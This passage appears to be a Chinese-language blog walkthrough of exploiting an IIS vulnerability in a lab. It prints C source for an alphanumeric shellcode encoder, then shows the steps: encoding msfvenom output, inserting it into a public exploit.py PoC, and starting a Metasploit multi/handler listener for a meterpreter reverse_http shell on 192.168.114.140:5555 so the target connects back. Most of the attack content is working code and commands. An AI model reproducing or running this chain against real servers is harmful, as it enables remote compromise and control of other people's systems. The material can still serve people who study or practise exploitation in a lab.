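// end-of-data marker (the trailing "A" printed at the end). --spaces adds
// 0x20 to the alphabet.
if (uppercase)
{
valid_chars = spaces ? " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ"
: "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ";
}
else
{
valid_chars = spaces ? " 0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
: "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
}

// Find the decoder stub for BASEADDRESS (matched case-insensitively, so
// "ESI" and "esi" are equivalent) and print it ahead of the payload.
for (i = 0; decoders[options][i].id != NULL; i++)
{
if (stricmp(baseaddress, decoders[options][i].id) == 0) break;
}
if (decoders[options][i].id == NULL)
{
fprintf(stderr, "%s: 无法识别的BASEADDRESS选项 ‘%s'\n"
"使用 '%s %s%s--sources' 获取一串 BASEADDRESS 选项.\n",
argv[0], baseaddress, argv[0],
uppercase ? "--uppercase " : "",
unicode ? "--unicode " : "");
exit(EXIT_FAILURE);
}
printf("%s", decoders[options][i].code);

// Encode and output the shellcode.
// `evil` is a string literal, so sizeof(evil) counts its terminating NUL;
// stop one short so that byte is not encoded as an extra 0x00 after the
// payload (the original loop ran to sizeof(evil) and emitted it). If evil
// is ever initialised from a brace list instead, use sizeof(evil) here.
for (j = 0; j < sizeof(evil) - 1; j++)
{
// Read as unsigned so bytes >= 0x80 are not sign-extended.
unsigned char input = (unsigned char)evil[j];
// Encoding AB -> CD EF (with --unicode the target sees CD 00 EF 00):
//   A, B = high and low nibble of the input byte
//   F    = B, carried through unchanged
//   D    = A ^ E for the ascii decoders (they XOR), or (A - E) mod 16
//          for the unicode-proof decoders (they ADD)
//   C, E = whatever high nibbles make CD and EF members of valid_chars
int A = (input & 0xf0) >> 4;
int B = input & 0x0f;
int EF = pick_char(valid_chars, B);
int E = EF >> 4;
int D = unicode ? (A - E) & 0x0f : (A ^ E);
int CD = pick_char(valid_chars, D);
printf("%c%c", CD, EF);
}

// Terminating "A" tells the decoder where the encoded data ends.
// Typical use: `alpha2 esp` when esp points at the shellcode on the target.
printf("A%s", nonewline ? "" : "\n");
exit(EXIT_SUCCESS);
}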


复制刚刚用msfvenom命令所生成的shellcode到.c文件中的如下位置:



由于 Kali 中的 gcc 编译出错，提示缺少头文件，我改在攻击机2中用 (MinGW) gcc 编译。(缺少的是 Windows 专用的 winsock.h，代码实际并未用到它；另外 stricmp 是 Windows 上的函数名，Linux 上对应 strcasecmp。去掉该 include、把 stricmp 换成 strcasecmp 后，应该就能在 Kali 上直接用 gcc 编译。)



最后生成exe文件



在cmd下使用:



使用--help获取帮助



使用 --uppercase --unicode esi (BASEADDRESS 参数不区分大小写，写 ESI 也可以；可用 --uppercase --unicode --sources 列出该模式下全部可选的 BASEADDRESS)



修改原 PoC (地址: https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py )：把脚本里原有的 alphanumeric shellcode 字符串替换为上一步 alpha2 输出的那一串，脚本其余部分保持不变:



回到攻击机1:

在Kali中打开msf做监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_http   (必须与 msfvenom 生成 shellcode 时使用的 payload 一致)

set LHOST 192.168.114.140

set LPORT 5555

exploit -j   以后台任务 (job) 方式启动监听，攻击期间可以继续使用 msf 控制台



再回到攻击机2:

执行修改后的python脚本



执行后会回连Kali攻击机 192.168.114.140的5555端口:







最后可以结合metasploit终端命令进一步操作:

参考地址:http://blog.csdn.net/mickeymouse1928/article/details/71107769